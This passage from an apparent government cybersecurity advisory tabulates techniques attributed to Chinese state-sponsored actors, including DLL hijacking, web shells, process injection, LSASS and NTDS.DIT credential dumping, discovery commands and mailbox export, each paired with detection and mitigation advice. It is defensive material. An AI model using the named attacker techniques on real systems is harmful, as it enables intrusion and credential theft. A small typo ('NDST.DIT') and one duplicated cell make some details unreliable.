[[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defensive Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. \n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] \n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. \n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. \n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling 